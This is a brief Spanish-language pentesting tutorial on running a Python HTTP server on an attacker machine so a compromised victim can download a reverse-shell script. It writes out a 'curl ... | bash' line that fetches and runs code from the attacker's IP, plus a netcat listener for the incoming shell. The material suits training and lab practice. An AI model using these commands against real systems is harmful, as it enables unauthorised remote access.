Servicio web de Python para Comunicarse en la Red

----------------------------------------------------------------------

Una vez hayamos obtenido ejecución remota de comandos en un servidor, suele ser necesario poder transferir archivos al objetivo o incluso ayudarnos de un servidor web para obtener la reverse shell, por lo que ahora vamos a ver, de forma breve, cómo levantar un servidor HTTP con python para lograr esto mismo.

en mi maquina atacate, voy a crear un payload que se llame “payload.sh”

Con nano creamos un fichero que se llame "payload.sh" e ingresamos el tipico script de revershell

Una vez guardado quiero que compartirlo con la maquina victima para que lo ejecute y para esto se puede usar

pyhton3 -m http.server 80

esto va a levantar un servidor por el puerto 80 con todos los archivos que se encuentren en el actual directorio

Si vamos a la maquina victima, abrimos el navegador y ponemos la ip de la maquina atacante que en este caso es 192.168.0.82, se accede al archivo que esta compartiendo desde la maquina atacante

Ahora corre un servidor web corriendo por el p 80 compartiendo archivos

Si vamos a la maquina victima, abrimos el navegador y ponemos la ip de la maquina atacante que en este caso es 192.168.0.82, se accede al archivo que esta compartiendo desde la maquina atacante

De tal forma que si le damos click al link

Una vez guardado se puede ejecutar.

Si tuvieramos ejecucion remota, dentro de la terminal, podriamos accionar de la siguiente forma:

curl http://192.168.0.82/payload.sh | bash

Escuchando desde la maquina atacante con nc -vlnp 443

Hacemos una peticion al servidor web donde se esta compratiendo el archivo y luego una vez obtenido el archivo, se va interpretar con bash